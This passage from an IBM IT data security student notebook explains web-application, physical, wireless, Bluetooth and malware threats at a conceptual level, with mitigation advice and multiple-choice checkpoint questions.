– If authentication which are stringent in nature is used, then spoofing attacks can be mitigated
– It must be made sure that the request which comes from a non-public domain is using the identity of
their own
Figure 1-56. Web-application Threats (1 of 5) DS011.0
Notes:
Spoofing: The attack in which the identity of a process or a user is impersonated in a way which is not
authorized is spoofing. Credentials of different users are typed in a spoofing attack. The content of a cookies
might also be changed by an attacker in order to pretend that the user is different or the cookie has been
generated from a different server. If authentication which are stringent in nature is used, then spoofing attacks
can be mitigated. It must be made sure that the request which comes from a non-public domain is using the
identity of their own. If the information associated to the credentials are kept safe, then also spoofing attack
can be prevented.

Student Notebook

IBM Power Systems
• Tampering
– To change or delete a resource without having the rights
– For example: A web page is defaced by an attacker who gets onto the site of the organization and
changes the files which are existing
– Exploiting the script of a website is an indirect way to carry out a tampering attack
– The script is also used as a link and sent to the user
Notes:
Tampering: To change or delete a resource without having the rights to do so is known as tampering. For
example: A web page is defaced by an attacker who gets onto the site of the organization and changes the
files which are existing. Exploiting the script of a website is an indirect way to carry out a tampering attack.
The script is used by a malicious attacker by masking it as the input of a user from a certain page. The script
is also used as a link and sent to the user. The user must use window security in order to build a defense
against tampering. The window security locks down directories, files and other resources associated to
windows. It should also be taken care that the application is running with the minimum privilege required. The
information which comes from an unknown database or user must not be trusted. This will help to guard a
system against script exploits

V10.1
Student Notebook
Uempty

IBM Power Systems
• Repudiation
– The credentials of a user is impersonated
– By using authentication which is stringent in nature, computing systems and web application can be
guarded against this type of attack
– Windows features of logging must be kept on an audit trail
Notes:
Repudiation: A transaction is carried out in this type of attack in such a way that the proof of the principal
behind the attack is hidden. The credentials of a user is impersonated to carry out such an attack in a web
application. By using authentication which is stringent in nature, computing systems and web application can
be guarded against this type of attack. Also if windows features of logging are kept on an audit trail, then also
these attacks can be minimized.

Student Notebook

IBM Power Systems
• Information Disclosure
– This simply means to steal or to reveal data which is private and should not be breached
– For example: To steal the password of a system or to disclose the information which involves file
access or access to a server
Notes:
Information Disclosure: The Information Disclosure section covers attacks designed to acquire system
specific information about a web site. This system-specific information includes the software distribution,
version numbers, and patch levels, or the information may contain the location of backup files and temporary
files. In most cases, divulging this information is not required to fulfill the needs of the user. Most web sites will
reveal some data, but it’s best to limit the amount of data whenever possible. The more information about the
web site an attacker learns, the easier the system becomes to compromise..

V10.1
Student Notebook
Uempty

IBM Power Systems
• Fuzzing
– To enter unexpected values in an application and cause the application to crash is fuzzing
– When that happens, it may be possible for the user to be left with elevated privileges or access to
values they should not have
– Those values can be unexpected, invalid or random
Notes:
Fuzzing: Most applications are written to accept input expect a particular type of data to be given string
values, numerical values, and so on. Sometimes, it is possible to enter unexpected values and cause the
application to crash. When that happens, it may be possible for the user to be left with elevated privileges or
access to values they should not have. The technique of inserting values and actions which are unexpected
as an application’s input to crash it down is known as fuzzing. Those values can be unexpected, invalid or
random and a common method is to flood the input with a stream of random bits. The best way to prevent
fuzzing from being an exploit possible on the systems is to do fuzz testing in order to find and fix the problems
first.

Student Notebook
IBM Power Systems
• Physical Security Threats

– There are numerous physical threats which can disrupt the physical security
– Physical security deals with intruders, physical destruction, theft, vandalism and environmental issues
etc.
– The view of the security professionals changes when they look at network security and physical
security
– For securing the network they concentrate on the modem, wireless access point etc.
Notes:
Physical security Threats
There are numerous physical threats which can disrupt the physical security and hence the confidential data
of an organization can be breached. Computer or network security is different from physical security as the
latter’s threats vary. Physical security deals with intruders, physical destruction, theft, vandalism and
environmental issues etc. The view of the security professionals changes when they look at network security
and physical security. For securing the network they concentrate on the modem, wireless access point etc.
from where someone can enter in an unauthorized manner but when looking at physical security , the security
professionals are more concerned with how people can cause an array of damage by entering an
environment physically. There are various threats that an organization faces. They are mentioned below:

V10.1
Student Notebook
Uempty
Physical Security Threats IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Natural Disaster
• Supply System Threats
• Man-Made Threat
• Political Threat
Figure 1-62. Physical Security Threats DS011.0
Notes:
Natural disasters: Earthquakes, volcano eruptions, tornadoes, floods, storms, extreme temperature
conditions, fire etc.
Supply system threats: Outages in the distribution of power, interruptions in communication and stoppage in
the supply of natural resources such as steam, air, gas etc.
Man-made threats: Explosions, unauthorized access (both external and internal), damage by angry
employees, case of vandalism, accidents due to employee’s error, fraud, theft etc.
Political threats: Riots, strikes, civil disobedience, bombing, terrorist attacks etc.
Insider Threat: Insiders, being able to access the network in a legit way, pose a threat to the information as it
can be easily misfiled, deleted, or altered. Thus, insider threats due to wrongful activities or mere
carelessness can cost an organization severely.
The threats mentioned above can exploit any vulnerability that may be present in the information system of
an organization which may have catastrophic effect on not only the productivity but also on the reputation of
the organization.

Student Notebook
IBM Power Systems
• Hacking & Social Engineering Threat

– Hacking Threat
• Data Security threats and malware are created by computers and used by hackers
• The process of stealing, changing or destroying data by the hackers is known as hacking.
• Computer hacking affects organizations in a variety of ways
– Social Engineering Threat

• Confidential and important information is extracted from employees
• Individual employees are manipulated and advantage is taken
Notes:
Hacking and Social Engineering Threat
Data Security threats and malware are created by computers and used by hackers who can exploit users for
personal profit by acquiring confidential information or stealing data by breaking into the systems of users.
This process of stealing, changing or destroying data by the hackers is known as hacking. Computer hacking
pervades global society in the digital age. The act of breaking into a secure computer network serves many
purposes, from corporate espionage to blatant theft and political insubordination. Computer hacking affects
organizations in a variety of ways, some universal, others specific to the nature of the reason for hacking and
the business in question. The direction of hacking, whether the organization hacks or gets hacked also has
an effect. Social engineering is another element of hacking.
The technique by which confidential and important information can be extracted from users is called Social
Engineering. Though the information to be acquired can vary, most commonly, the “social engineers” aim at
acquiring passwords or company information ,or install malware without the knowledge of the user which
gives them access and control of the user’s computer system. The tactics used by these criminals to
manipulate individuals over their natural inclination so that the criminals can gain trust of the user and pose as
trouble-shooters or offer any other assistance to them. Thus, the users blindly fall into these well planned
traps when in need or lack proper awareness.

V10.1
Student Notebook
Uempty
IBM Power Systems
• Wireless Network Security Threat

– Wireless LANs increase the risk of wireless network attacks in almost every environment.
– When a wireless network is deployed, it does not require any real physical access and can be
exploited and manipulated easily
– Computer hacking affect organizations in a variety of ways
Notes:
Wireless network security threats
Wireless LANs increase the risk of wireless network attacks in almost every environment. The main reason
for this is the lack of wireless network knowledge among individuals making them vulnerable to malicious
attacks. In a wired network, since there is a wire connecting servers and network, it makes it difficult to be
exploited without any kind of physical access. However, when a wireless network is deployed, it does not
require any real physical access and can be exploited and manipulated easily. Some fundamental threats that
exist in wireless LANs are illustrated and explained in the slides to follow.

Student Notebook
Wireless Network Security Threat (1 of 5) IBM ICE (Innovation Centre for Education)
IBM Power Systems
Figure 1-65. Wireless Network Security Threat (1 of 5) DS011.0
Notes:
The various types of wireless security threats have been illustrated in this slide with the help of a diagram.
These threats have been explained in the slide which follows.

V10.1
Student Notebook
Uempty
Wireless Network Security Threats (2 of 5) IBM ICE (Innovation Centre for Education)
IBM Power Systems
• Rogue Access Point/Ad-Hoc Networks

– Attackers can make users to trust their legitimate devices to be connected to an access point
– This rogue access point is setup by attackers when they target an existing wireless LAN
– The physical access takes care of the issue of the short life-time of vulnerability
Figure 1-66. Wireless Network Security Threats (2 of 5) DS011.0
Notes:
Rogue Access Points/Ad-Hoc Networks: Attackers can make users to trust their legitimate devices to be
connected to an access point (rogue access point) over the legitimate access points. This rogue access point
is setup by attackers when they target an existing wireless LAN. This rogue access point, used to fool users,
is setup within the range of wireless LAN. However, there is a requirement of physical access for achieving a
satisfactory level of effectiveness. The physical access takes care of the issue of the short life-time of
vulnerability because user is unable to perform any of the usual duties after connecting to a rogue access
point. The attacker can get data for a longer period time if there is a chance to gain access to a physical port
on the network of an organization. The attacker can hook access point to this port and trick other
systems/devices to connect with the rogue access point and gain access to data through it. If the wireless
LAN provides Internet access, it makes it easier for the rogue access points to fool a user by offering Internet
and exploit the vulnerability that increases many folds. Unauthorized ad-hoc (temporary networks) and
unauthorized access points use similar technique. These kind of networks lack proper security measures
leaving them vulnerable to attacks

Student Notebook
IBM Power Systems
• Denial of Service
– This attack denotes very limited access toward services.
– A target is specified and traffic is directed its way.
– This is another way for limiting access to services apart from targeting traffic.
– This technique works if the LAN works on a 2.4GHz band
Notes:
Denial of Service: This attack denotes very limited access toward services. The access to service is blocked
by flooding the system with traffic. A target is specified and traffic is directed its way. Wireless networks are
vulnerable to flooding by interference to the signal using 2.4 GHz band. This is another way for limiting
access to services apart from targeting traffic. A simple microwave oven or a competing access point on the
channel can be used to cause interference. This technique works if the LAN works on a 2.4GHz band. The
DoS attack can be integrated with a rogue access point to cause service interruption. A channel, which is not
being used by a legitimate access point, is utilized to set up a rogue access point and then the channel is
attacked with denial of service.

V10.1
Student Notebook
Uempty
IBM Power Systems
• Configuration Problems
– Grade access points are shipped with no security configuration, which causes configurations
complexities
– These devices can be configured by any amateur user to gain access
– Weak security deployments, weak passphrases and using default SSID are other issues that increase
risks
Notes:
Configuration Problems: Since, in most cases, consumer/SOHO grade access points are shipped with no
security configuration, this leads to configurations complexities. These devices can be configured by any
amateur user to gain access as setting up these devices is not a complex task. However, this also makes the
vulnerable to external use without requiring any extra effort. Weak security deployments, weak passphrases
and using default SSID are other issues that increase risks.

Student Notebook
IBM Power Systems
• Passive Capturing
– The listening and capturing of data
– Non-secured traffic can be analyzed or current security settings can be broken
– High security measures can be implemented to provide a higher level of security
Notes:
Passive Capturing: The listening and capturing of data that can be done by approaching within the range of
a wireless network is what is called as passive capturing. Non-secured traffic can be analyzed or current
security settings can be broken by using simply getting in the range of the network. Since wireless network is
essentially without any physical access, there is not really a way to prevent such attacks. However, high
security measures can be implemented to provide a higher level of security.

V10.1
Student Notebook
Uempty
IBM Power Systems
• Bluetooth Devices Threats

– Bluetooth was officially approved in the summer of 1999
– Bluetooth offers several benefits and advantages, but the benefits are not provided without risk
– Bluetooth security includes authorization, authentication and optional encryption
Notes:
Bluetooth devices threats
Bluetooth technology has been considered as a cheap, reliable, and power efficient replacement of cables for
connecting electronic devices. This technology was officially approved in the summer of 1999. Since then it
has widely been used in various electronic devices. Bluetooth offers several benefits and advantages, but the
benefits are not provided without risk. Bluetooth security includes authorization, authentication and optional
encryption. Authentication is the proving of identity of one Bluetooth-enabled device to another. Authorization
is the granting or denying of Bluetooth connection access to resources or services from the requesting
device. Encryption is the translating of data into secret code so that eavesdroppers cannot read its content.
The use of Bluetooth may result in exploits and loss of data, in-spite of all the mechanisms of defenses that
are in place through various threats. These threats are illustrated in the slide which follows.

Student Notebook
Bluetooth Devices Threats (1 of 5) IBM ICE (Innovation Centre for Education)

IBM Power Systems
Figure 1-71. Bluetooth Devices Threats (1 of 5) DS011.0
Notes:
This slide illustrates the different types of Bluetooth device threats which have been explained in the slides
which follow.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Blue-jacking
– Messages which are unsolicited in nature or business cards are sent by an attacker to a Bluetooth-
enabled device
– Bluejacking resembles phishing attacks and spams carried out against users who use e-mails.
– Bluetooth device owners should be aware that a variety of social engineering attacks may be caused
where it manipulates user into performing actions or divulging confidential information
Notes:
Blue-jacking: This is the process where messages which are unsolicited in nature or business cards are sent
by an attacker to a Bluetooth-enabled device. Bluejacking resembles phishing attacks and spams carried out
against users who use e-mails. When a bluejacking message is sent with a harmful intent, it might entice
users to respond with action to add the new contact to the device’s address book. Bluetooth device owners
should be aware that this might cause a variety of social engineering attacks where it manipulates user into
performing actions or divulging confidential information. Devices that are set in non-discoverable mode are
not susceptible to bluejacking and in order for bluejacking to work; the sending and receiving devices must be
within 10 meters distance

Student Notebook

IBM Power Systems
• Blue-snarfing
– Connections are forced to a device which has Bluetooth feature in it, in order to access data in it
– The IMEI number stored in the phone’s memory is used to divert calls
– It is much more malicious compared to bluejacking
Notes:
Blue-snarfing: This is a method to which forces connection to a device which has Bluetooth feature in it, in
order to access data such as calendar, contact list, text messages, emails, pictures and the IMEI number
which stands for international mobile equipment identity. The IMEI number is stored in the phone’s memory.
IMEI is a unique identifier for devices, and can be exploited by an attacker to divert all incoming calls from the
user’s device to the attacker’s device. As sensitive information may be stolen from devices through
bluesnarfing, it is much more malicious compared to bluejacking, even though both exploit device’s Bluetooth
connections without the owners’ knowledge. By setting a device’s Bluetooth to non-discoverable mode, the
device becomes less susceptible to bluesnarfing although it may still be bluesnarf-able via brute force attack

V10.1
Student Notebook
Uempty

IBM Power Systems
• Blue-bugging
– This method was developed after the onset of bluejacking and bluesnarfing
– Attackers access a Bluetooth device remotely
– The features are used in examining calendars, reading the phonebooks, connecting to Internet,
placing calls etc.
Notes:
Blue-bugging: This method was developed after the onset of bluejacking and bluesnarfing where the
attackers are allowed to access a device with Bluetooth features remotely and then the features are used in
examining calendars, reading the phonebooks, connecting to Internet, placing calls, carrying out eavesdrop
on a call by forwarding it and sending text and multimedia messages without the knowledge of the user. As
with all the attacks, the attacker must be within a 10 meters distance from the device

Student Notebook

IBM Power Systems
• Blue-smack
– This is a DOS attack for Bluetooth.
– Device is overcome by generating excessive requests
– These requests generated are malicious in nature which causes the devices to be in an inoperable
state
Notes:
Bluesmack: This is a DOS attack for Bluetooth. In this attack, the device which is enabled for Bluetooth is
overcome by requests generated by an attacker. These requests generated are malicious in nature which
causes the devices to be in an inoperable state for its owner which drains the battery of the device, affecting
the continued operation of the device after the attack. Due to the proximity required for Bluetooth connection,
users can move the device to a new location to prevent the attack from happening
These are the different threats that a data security system faces. Threats exploit vulnerability present in the
system and make the system to come down. The vulnerabilities and countermeasures to mitigate these risks
have been discussed in the next chapters

V10.1
Student Notebook
Uempty
Data Threats in Modern Era (1 of 6) IBM ICE (Innovation Centre for Education)
IBM Power Systems
• The hostile nature of people has been found lower and the data security threats have
increased
• Facebook scams have gone out of hand
• Shellshock and Heartbleed and super mega retail breaches
Figure 1-76. Data Threats in Modern Era (1 of 6) DS011.0
Notes:
Data threats in modern era
Speaking of modern era and talking of year 2014 in particular, the hostile nature of people has been found
much lower levels and the data security threats have increased. As we learn from our past, new
complications await in the future. Some of the data breach examples that occurred in 2014 are Facebook
scams that got out of hand, Shellshock and Heartbleed and super mega retail breaches. Some of the most
common threats of the year 2014 are given in the next slide.

Student Notebook
IBM Power Systems
• Cloud Disaster
– All the organizations are rushing to the cloud and are over dependent on it
– There were some serious breaches in cloud computing in the year 2014
– Amazon was forced to reboot its EC2 instances due to the Xen bug
Notes:
Cloud disasters: All the organizations are rushing to the cloud and are over dependent on it. Despite this,
they are terrified when it comes to cloud security. There were some serious breaches in cloud computing in
the year 2014. For example: Amazon was forced to reboot its EC2 instances due to the Xen bug. Another
example came when the private photos of celebrities on apple’s ICloud were published. Thus cloud disasters
and the threats due to which these disasters took place were in news in the year 2014

V10.1
Student Notebook
Uempty
IBM Power Systems
• Threats Associated to Application Security

– Different applications were affected
– The personal information and the privacy of 7 million online application users were violated in the year
2014
– Millions of Dropbox account credentials were breached
Notes:
Threats associated to application security: The threats affected different applications greatly. All the data
was breached and then it was published publically. For example: The personal information and the privacy of
7 million online service users were violated in the year 2014. This was due to two of the biggest data thefts in
the applications Dropbox and Snapchat. Millions of Dropbox account credentials were breached and the user
names and passwords associated with the Dropbox account was published without even the knowledge of
the users.

Student Notebook
IBM Power Systems
• IoT Security Threats

– IoT devices are exposed to the same attacks as other Internet-connected devices, such as denial-of-
service attacks etc.
– One major IoT attack disclosed recently was found by Akamai Technologies Inc.
– Researchers reported distributed denial-of-service (DDoS) attacks that started using insecure IoT
device configurations
Notes:
IoT Security Threats: Internet of Things (IoT) devices are the newest round of devices directly connected to
IP networks and network security risks. Thus, IoT attacks are inevitable. IoT devices are exposed to the same
attacks as other Internet-connected devices, such as denial-of-service attacks or default accounts with
default passwords and enterprises may have already encountered such issues. While their attack surface
may be smaller than a traditional desktop or server, when all IoT devices are added together, even minor
security issues will turn into significant problems. One major IoT attack disclosed recently was found by
Akamai Technologies Inc. Researchers reported distributed denial-of-service (DDoS) attacks that started
using insecure IoT device configurations. More specifically, attackers identified how the Simple Service
Discovery Protocol (SSDP) can be abused to amplify malicious responses to spoofed IP traffic to participate
in DDoS attacks. Researchers noted attackers target network ranges in their scanning and send SSDP
search requests to identify IoT devices; the response traffic is then sent to the target network as part of the
DDoS attack.

V10.1
Student Notebook
Uempty
IBM Power Systems
• Shellshock
– The Shellshock Unix/Linux Bash security hole affected almost half of the websites on the internet
– UNIX, Linux and Mac servers were an easy attack for malware as Shellshock
– Mail servers were affected on these servers and the bug, which had been in Bash Shell for around 20
years
Notes:
Shellshock: There was a security loop hole detected in September 2014 which made the news being
considered a serious problem. Popular as The Shellshock Unix/Linux Bash security hole, it affected almost
half of the websites on the internet. UNIX, Linux and Mac servers were an easy attack for malware as
Shellshock offered an easy pathway for worm entry. Mail servers were affected on these servers and the bug,
which had been in Bash Shell for around 20 years, got entered in a configuration and got exploited openly on
its first day in the public.

Student Notebook
IBM Power Systems
• Heartbleed
– Sensitive data (like passwords and encryption keys) are at risk
– A hacker can easily get his hands on confidential information
– The data can be swiped, leaving no track or trace
Notes:
Heartbleed: In the light of this encryption loophole, sensitive data (like passwords and encryption keys) are at
risk by providing access to view secure communication across HTTPS. A hacker can easily get his hands on
confidential information regarding financial details or information like personal identity. The data can be
swiped then leaving no track or trace.
.

V10.1
Student Notebook
Uempty
Benefits of Data Security (1 of 2) IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Confidentiality, integrity and availability of data is maintained
• It is made sure that the vital data is not misused
• Data security can make an organization’s data secure
Figure 1-82. Benefits of Data Security (1 of 2) DS011.0
Notes:
Benefits of Data Security
For running a new organization or a small business, all sort of different personal data and information are to
be dealt with. To ensure that this data is not abused or used in a way which might compromise the customer
or private individual to their detriment, there should be data security mechanism in place. There are many
advantages of securing data which have been explained in the slides which follow.
.

Student Notebook
Benefits of Data Security (2 of 2) IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Critical Information Protection
• Reduce Costs of Development
• Software Interoperability
• Meeting Current Standards
Figure 1-83. Benefits of Data Security (2 of 2) DS011.0
Notes:
Critical information protection: Sensitive information is always at risk and must always be kept under
protection. Loss of valuable information can bring an organization to its knees. Whether the organization is
developing factory automation solution or a custom application, valuable application must be protected to
keep the IT infrastructure of the organization intact.
Reduced Costs of Development: An organization should have a well-structured security system. Premature
addition of security, before realizing what the real needs are, or before installation of necessary systems,
results in massive modifications of code. If the software is left unsecured, it can cause unintentional loss of
data. This further leads to development reduction, significant money loss and time loss. Thus, they will be
forced to add security afterwards.
Software Interoperability: Software interoperability can be improved if an organization has a well-built
security framework. Exchange formats and custom data storage are preferred by organizations as they think
these mechanisms are implemented in a quick and effective manner. However, later, it leads to added
expenses as the need for communicating with other applications arises. This in turn requires creation of data
converters or altering formats. This asks for an additional resources to be spent but in turn ensures the best
achievable software interoperability.
Meeting Current Standards: To ensure data to be secured properly it should be ensured that the current
technology is kept updated. Certain standards need to be followed and these standards should be updated
time to time so as to provide adequate data protection. Keeping in sync with the developments being made is
an important part of software security.

V10.1
Student Notebook
Uempty
Checkpoint (1 of 4) IBM ICE (Innovation Centre for Education)

IBM Power Systems
1. Bluebugging is associated to which wireless device?

– Infrared
– Wi-Fi
– Bluetooth
– ZigBee
2. Which bug forced Amazon reboot its EC2 instances?

– Xen bug
– Shellshock bug
– Heartbleed bug
– Software bug
3. The art of manipulating people so they give up confidential information is called?

– Hacking
– Social engineering
– Packet Sniffing
– Phishing
Figure 1-84. Checkpoint (1 of 4) DS011.0
Notes:
Write down your answers here
1. …
2. …
3. ...

Student Notebook

IBM Power Systems
4. Frequency Analysis is included in which technique?

– Code-breaking technique
– Code-attacking technique
– Code-simplifying technique
– Code-revealing technique
5. A resource is changed or deleted without authorization in?

– Spoofing
– Repudiation
– Tampering
– Fuzzing
6. In which technique values and actions are inserted unexpectedly as an application’s input
to crash it down?
– Spoofing
– Repudiation
– Tampering
– Fuzzing
Notes:
Write down your answers here:
4. …
5. ….
6. ...

V10.1
Student Notebook
Uempty

IBM Power Systems
7. Which of the following is a cryptographic threat?

– Bluebugging
– Hacking and Social Engineering Threat
– Botnets
– Birthday Attack
8. Which of the following is a network based threat?

– Bluebugging
– Botnets
– Tampering
Notes:
7. . …
8. . …

Student Notebook

IBM Power Systems
9. Polymorphic is a?
– Virus
– Worms
– Trojan
– Bug
10. Which are the two different channels which are most vulnerable in the modern times?
– Physical storage and Data networks
– Data storage and Physical networks
– All of the above
– None of the above
Notes:
9. …
10. …

V10.1
Student Notebook
Uempty
Unit summary IBM ICE (Innovation Centre for Education)

IBM Power Systems
Having completed this unit, you should be able to:

Figure 1-88. Unit summary DS011.0
Notes:

Student Notebook

V10.1
Student Notebook
Uempty
Unit 2. Data Security Threat Techniques

This unit is about
• Introduction to threat techniques
• Classification of different threat techniques
• Process involved in attacks

• Have a basic understanding of threat techniques
• Classify all the threat techniques
• Identify and understand the steps involved in various attacks

• Checkpoint
References
2009
© Copyright IBM Corp. 2015 Unit 2. Data Security Threat Techniques 2-1
Student Notebook
Welcome to:
IT Data Security – Data Security Threat Techniques
Figure 2-1. IT Data Security – Data Security Threat Techniques DS011.0
Notes:

V10.1
Student Notebook
Uempty

IBM Power Systems

Notes:
Student Notebook
Introduction IBM ICE (Innovation Centre for Education)

IBM Power Systems
• An event or a person who has the potential for effecting a resource which is valuable in a
negative manner can be termed as a threat
• Software and Hardware systems and the data that they hold can be vulnerable to a huge
variety of threats
• When selecting the security procedures and features, the specific vulnerabilities associated
to the system must be considered and not just the general objectives of security
• Thus it can be said that a factor which posses the potential for impacting a resource which is
valuable for an organization in a negative manner is known as threat
• The way that these factors follow to carry out the negative effect is known as threat technique
Figure 2-3. Introduction DS011.0
Notes:
Introduction
An event or a person who has the potential for effecting a resource which is valuable in a negative manner
can be termed as a threat. The quality of a resource which allows the threat to be carried out is the
vulnerability of that resource. For example, in case of a bank robbery, the robber is the threat and the bank
teller is the valuable resources which is vulnerable to a robbery. The robber can shoot and kill the bank teller
but a bullet proof glass between the teller and the robber will deny the latter to kill the former. Although the
threat still persist but due to the presence of a protective mechanism that is the bullet proof glass the threat
can be mitigated. Thus it can be said that vulnerability and threat are not the same thing. In data and system
security as well threat remains presence but can be mitigated through the proper implementation of security
processors and features which will be discussed in next chapter. To prevent or mitigate the threat so that it
does not have a bad effect on the organization is known as implementing countermeasures.
Software and Hardware systems and the data that they hold can be vulnerable to a huge variety of threats.
When selecting the security procedures and features, the specific vulnerabilities associated to the system
must be considered and not just the general objectives of security. Over protection of a resource only creates
inconvenience to the user of the resource.
Thus it can be said that a factor which posses the potential for impacting a resource which is valuable for an
organization in a negative manner is known as threat and the way that these factors follow to carry out the
negative effect is known as threat technique. Below discussed are all the threat techniques that can affect the
assets of an organization.

V10.1
Student Notebook
Uempty
Threat Techniques (1 of 66) IBM ICE (Innovation Centre for Education)

IBM Power Systems
• A weaknesses or fault in a system or protection mechanism that opens it to attack or damage
• Threat techniques also change according to the field of security
• The following slides describe all these threat techniques in a detailed manner according to
the area of security.
Figure 2-4. Threat Techniques (1 of 66) DS011.0
Notes:
Threat Techniques
A weaknesses or fault in a system or protection mechanism that opens it to attack or damage are known as
threat techniques. Different area of security that is whether it is physical security, network security etc. has
different threats associated to it and as result the threat techniques also change according to the field of
security. The following slides describes all these threat techniques in a detailed manner according to the area
of security.
Student Notebook

IBM Power Systems
• Malware Threat Techniques

– Malwares exploit the holes present in security of a browser
– Consumers are tricked to download certain software
– This is a trick where the consumers actually download a malware to their systems.
Notes:
Malware Threat Techniques
To invade a machine, malwares exploit the holes present in security of a browser. Sometimes consumers are
tricked to download certain software which the websites state that are compulsory for viewing some content
of the site. This is a trick where the consumers actually download a malware to their systems. They are given
two options that is yes or no. If they click yes they download the malware to their systems and if they click no,
many error windows are displayed. Some sites also tell the customer to use a certificate that will make the
site safe to use. This is also a trick which is used by the website to download malwares to the system of the
customer

V10.1
Student Notebook
Uempty

IBM Power Systems
• Malware Threat Techniques

– Malwares install code in hidden and un-expected places like in the window registry
– Operating system is modified sometimes by malware
– This makes malware difficult to uninstall
Notes:
Sometimes uninstall option is not provided by some malwares and they install code in hidden and
un-expected places like in the window registry. They also some time modify the operating system and makes
it difficult to remove or uninstall them.
In the diagram given in the next slide, the 5 stages of a web malware attack are illustrated
Student Notebook

IBM Power Systems
Notes:
Five stages of malware attack is illustrated in this slide. These stages have been explained in the slides which
follow.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Stage 1: Entry
• Stage 2: Distribution
• Stage 3: Exploit
• Stage 4: Infect
• Stage 5: Execute
Notes:
Stage 1: Entry: The first part of an attack involves a drive-by download from an entry point, either a hijacked
website or an email that contains a malicious link.
Drive-by downloads: A drive-by download is the process of inadvertently downloading malicious web code
simply by visiting a web page. A drive-by download happens automatically and without the user knowing. The
most common type of drive-by download is an invisible 0x0 pixel iFrame that contains malicious JavaScript
code. And this sophisticated JavaScript can be masked by obfuscation (in other words, making them
unreadable), as well as polymorphic (meaning, the code changes with each view). Traditional
signature-based antivirus solutions can’t detect this kind of tricky code.
Stage 2: Distribution: Once a drive-by download has reached the browser, the unsuspecting user is
redirected to download an exploit kit. However, rather than sending users to known exploit kit hosting sites,
elaborate traffic distribution systems (TDS) create multiple redirections that are nearly impossible to track and
therefore black-list.
Some TDS systems are legitimate, for instance those used for advertising and referral networks. But like any
software, legitimate TDS solutions are prone to being hacked and exploited to drive traffic to malware hosting
sites instead of a benign destination.
Stage 3: Exploit: The next phase of a modern web attack is the downloading of an exploit pack from the
malware hosting site. These kits execute a large number of exploits against vulnerabilities in web browsers
and associated plug-ins such as Java, PDF readers and media players.
Student Notebook
Stage 4: Infect: Once the attacker exploits an application vulnerability to gain some control over the
computer, the next step in the attack is to download a malicious payload to infect the system. The payload is
the actual malware or virus that will ultimately steal data or extort money from the user.
The hacker can choose from a wide range of different infectious payloads. Here are some of the most
common payloads used today.
• Zbot (Zeus): Zeus is a Trojan horse that steals personal information by logging keystrokes and grabbing
frames in the browser. It initially targeted Windows machines but variants have been found that infect
Android mobile devices as well
• Ransomware: Ransomware is a class of malware that restricts access to a user’s computer or files,
demanding payment to regain access. It primarily targets Windows, but there’s also a less harmful but
equally annoying Mac variant that recently started appearing
• PWS: PWS is a password stealing and remote access Trojan that infects Windows computers.
• Sinowal (Torpig): Torpig is a botnet infection which targets Microsoft Windows computers. It uses a root
kit to steal credentials and allow remote access.
• FakeAV: FakeAV (fake antivirus) installs a rouge security software client that appears to be a desktop
antivirus application. It scans and finds numerous fake viruses and extorts the user into paying to “clean
up” the viruses. It primarily plagued Windows systems, but is now being found on Macs as well
Stage 5: Execute: In this final stage of the attack, the malicious payload has been downloaded and installed
on the victim’s system and now its job is to make the criminal behind it some money. It can do that in a
number of ways: by providing credentials, banking or credit card information that can be sold on the black
market, or by extorting the user into paying directly. Ransomware and FakeAV are both examples of malware
that extort victims into paying.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Stage 1: Entry
– This involves a drive-by download from an entry point
– Drive-by downloads is the process of inadvertently downloading malicious web code
– A drive-by download happens automatically and without the user knowing
Notes:
Stage 1: Entry: The first part of an attack involves a drive-by download from an entry point, either a hijacked
website or an email that contains a malicious link.
Drive-by downloads: A drive-by download is the process of inadvertently downloading malicious web code
simply by visiting a web page. A drive-by download happens automatically and without the user knowing. The
most common type of drive-by download is an invisible 0x0 pixel iFrame that contains malicious JavaScript
code. And this sophisticated JavaScript can be masked by obfuscation (in other words, making them
unreadable), as well as polymorphic (meaning, the code changes with each view). Traditional
signature-based antivirus solutions can’t detect this kind of tricky code.
Student Notebook

IBM Power Systems
• Stage 2: Distribution
– The unsuspecting user is redirected to download an exploit kit
– Traffic distribution systems (TDS) create multiple redirections that are nearly impossible to track
– Some TDS systems are legitimate
– But like any software, legitimate TDS solutions are prone to being hacked and exploited
Notes:
Stage 2: Distribution: Once a drive-by download has reached the browser, the unsuspecting user is
redirected to download an exploit kit. However, rather than sending users to known exploit kit hosting sites,
elaborate traffic distribution systems (TDS) create multiple redirections that are nearly impossible to track and
therefore black-list.
Some TDS systems are legitimate, for instance those used for advertising and referral networks. But like any
software, legitimate TDS solutions are prone to being hacked and exploited to drive traffic to malware hosting
sites instead of a benign destination.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Stage 3: Exploit
– An exploit pack is downloaded from the malware hosting site
– A large number of exploits are executed
Notes:
Stage 3: Exploit: The next phase of a modern web attack is the downloading of an exploit pack from the
malware hosting site. These kits execute a large number of exploits against vulnerabilities in web browsers
and associated plug-ins such as Java, PDF readers and media players.
Student Notebook

IBM Power Systems
• Stage 4: Infect
– A malicious payload is downloaded to infect the system
– The payload is the actual malware or virus that will ultimately steal data or extort money from the user
– The hacker can choose from a wide range of different infectious payloads
Notes:
Stage 4: Infect: Once the attacker exploits an application vulnerability to gain some control over the
computer, the next step in the attack is to download a malicious payload to infect the system. The payload is
the actual malware or virus that will ultimately steal data or extort money from the user.
The hacker can choose from a wide range of different infectious payloads. Here are some of the most
common payloads used today.
Zbot (Zeus): Zeus is a Trojan horse that steals personal information by logging keystrokes and grabbing
frames in the browser. It initially targeted Windows machines but variants have been found that infect Android
mobile devices as well
Ransomware: Ransomware is a class of malware that restricts access to a user’s computer or files,
demanding payment to regain access. It primarily targets Windows, but there’s also a less harmful but equally
annoying Mac variant that recently started appearing
PWS: PWS is a password stealing and remote access Trojan that infects Windows computers.
Sinowal (Torpig): Torpig is a botnet infection which targets Microsoft Windows computers. It uses a root kit to
steal credentials and allow remote access.
FakeAV: FakeAV (fake antivirus) installs a rouge security software client that appears to be a desktop
antivirus application. It scans and finds numerous fake viruses and extorts the user into paying to “clean up”
the viruses. It primarily plagued Windows systems, but is now being found on Macs as well

V10.1
Student Notebook
Uempty
IBM Power Systems
• Stage 5: Execute
– The malicious payload makes the criminal behind it some money
– This is done by selling credentials or by extorting the user into paying directly
– Examples: Ransomware and FakeAV
Notes:
